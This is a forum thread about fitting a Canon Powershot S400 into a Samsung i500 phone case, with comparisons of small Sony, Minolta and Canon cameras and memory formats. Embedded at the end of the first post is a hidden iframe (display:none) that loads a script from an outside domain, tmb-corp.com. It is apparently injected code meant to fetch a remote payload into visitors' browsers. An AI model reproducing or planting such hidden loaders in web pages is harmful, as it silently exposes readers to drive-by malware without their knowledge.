I posted this awhile ago, but I thought I'd start fresh since I finally took pics. I was travelling with my I5 and Canon Powershot S400, and I actually took my Sprint case as a means of protection for the I5. I never had a good case for the Canon and I realized that it would fit in the Samsung case. It actually fits almost perfectly. A little trim on the side for the lanyard area, and the leather needs just a little stretch to snap shot. You can see in the one pic that you can make out the zoom ring at the top right of the case (left on the screen). So if you thought your case was a waste, now you can put it to some use or let someone you know with the cam to put it to use.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
sorry these aren't crisp and clear, but it was the best my webcam could do since my camera was preoccupied.
case closed. notice slight stretch area around the zoom ring. The only thing I make sure is that I leave it on viewing mode so I don't chance turning it on and have the lens try and open up. With the belt clip though it's great having it at the ready if my pockets aren't accommodating.
and it has an underwater housing like the canon's. my powershot will be on ebay real quick. It should be available in january for around $550, but for the must have's, dynanism has it for 699 on sale now.
Yes I saw that, very nice looking. It all depends on what quality Sony builds into it though. I had the U series tiny cameras before and found they took crappy photos. Of course the larger Sony cameras are much nicer.
I don't know much about the U series, but the P series have gotten very good reviews, and I've seen some nice pics from a friend's cam. The addition of the Carl Zeiss lens, true 5mp sensor and the 2.5" lcd on the back are big plusses. Some companies have skimped on the ccd in the smaller cameras trying to fit a larger picture on a smaller ccd so Sony is doing it right on this cam. It can also capture hi res video as well that claims it looks as if it came from a digital camcorder. It looks like they have a winner. I'm sure there will be a review on it soon. Shame they have a general release in January. Would do well for Christmas.
The Sony's are too wide for the case. The Powershot series are the largest cams that will fit in there, and that requires the slightest stretch in the flap to snap it shut.
Originally posted by crogs571 there you go. might as well put it to good use. When I exchanged out my I500 for a new one, I kept the old case so I now have two of them.
So you like your gadgets...You'll want to ditch your optio S after seeing this....

wow,
that is one impressive looking LITTLE digicam. I have the latest Minolta Dimage which uses the same "folded" lens system and have been extremely impressed by tye pics it takes. The only place it really fails is with limited strength of the flash and lack of a real macro feature. I just wish sony hadn't started another proprietary memory format. I am currently using sd and flash and don't want to add a third type to my memory card collection!

I hear you on the memory. I just got rid of my flashbased mp3 for a rio karma. so now that I'm hd bound I got rid of my sd card. And my powershot is CF memory so I'd sell that with the camera to get the Canon. So i'd be down to one type of memory. It's not like I need SD for my I500...haha. Imagine if sony made a palm phone with memory stick. All I can say is when I take a trip...my i500, Rio Karma, and that Sony camera and I'd be in gadget heaven.
